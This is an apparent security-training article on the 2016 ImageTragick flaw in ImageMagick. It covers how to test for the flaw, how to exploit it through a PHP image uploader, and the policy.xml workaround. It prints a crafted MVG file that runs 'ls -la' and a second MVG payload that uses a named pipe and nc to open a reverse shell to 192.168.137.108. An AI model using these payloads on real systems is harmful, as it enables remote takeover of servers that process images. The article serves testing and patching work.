Hacking

Exploiting ImageTragick

Warlock
May 23, 2016 by
Warlock

This article explains a recently discovered ImageTragick bug and how to find, exploit and fix it.

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

Overview

Few weeks ago, a security researcher named Stewie and Nikolay Ermishkin found multiple vulnerabilities in an Open Source Utility named ImageMagick. ImageMagick is software used by various applications for image manipulation ranging everything from resizing of the image to converting an image into different formats.

This vulnerability affects all the versions below 6.9.3-9. The vulnerability arises when insufficiently filtered filename is passed to delegate command. As per the details of initial POC, it is very simple to exploit. In this article, we will have a look at how to test and fix this vulnerability.

Am I vulnerable?

For verifying the vulnerable version follow the below steps:

Step 1: Enter following a piece of code in a file named exploit.mvg.

push graphic-context

viewbox 0 0 640 480

fill 'url(https://127.0.0.1/oops.jpg"|ls "-la)'

pop graphic-context

Step 2: We will now try to convert the exploit.mvg into exploit.png using the following command.

Convert exploit.mvg exploit.png

If your installed version is vulnerable, it will execute the "ls –la" command and list the contents of a current directory.

We can see at the second line; the tool tries to download the file named image.png using curl by executing system call and at the same time found the pipe character and further executes our payload.

Exploitation

To exploit the vulnerability, I have created a simple file uploader in PHP containing following piece of code.

In the highlighted part, we can see that the code takes any image file and creates a thumbnail of it.

NOTE: NO MATTER HOW MUCH SECURE YOUR FILE UPLOADER IS IF ITS USING VULNERABLE VERSION OF IMAGEMAGICK YOU ARE STILL VULNERABLE AND OF RISK GETTING COMPROMISED.

We will now create a PNG file containing following piece of code and upload it the server.

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|mknod /tmp/pipez p;/bin/sh 0</tmp/pipez|nc 192.168.137.108 1111 1>/tmp/pipez;rm -rf "/tmp/pipez)'

pop graphic-context

As in this case our vulnerable machine is installed with the traditional netcat package, so we are using named pipes to direct the output of system command to and from the shell.

We first started a simple ncat listener on our Kali machine to receive a reverse shell.

Further as we hit the upload button, our exploit gets triggered, and we receive a reverse shell.

How to fix it?

The ImageMagick team has shared the workaround for a vulnerable version without the need of updating the utility. The original post is published here. It basically says you need to add following policies to your policy.xml file.

<policy domain="coder" rights="none" pattern="EPHEMERAL" />

<policy domain="coder" rights="none" pattern="HTTPS" />

<policy domain="coder" rights="none" pattern="MVG" />

<policy domain="coder" rights="none" pattern="MSL" />

<policy domain="coder" rights="none" pattern="TEXT" />

<policy domain="coder" rights="none" pattern="SHOW" />

<policy domain="coder" rights="none" pattern="WIN" />

<policy domain="coder" rights="none" pattern="PLT" />

As can be seen below after making the changes in the policy.XML file we are unable to execute a command on the system, and utility throws an error message when we are trying to convert the malicious file.

Become a Certified Ethical Hacker, guaranteed!

Become a Certified Ethical Hacker, guaranteed!

Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.

Sources

 

Warlock
Warlock

Warlock works as a Information Security Professional. He has quite a few global certifications to his name such as CEH, CHFI, OSCP and ISO 27001 Lead Implementer. He has experience in penetration testing, social engineering, password cracking and malware obfuscation. He is also involved with various organizations to help them in strengthening the security of their applications and infrastructure.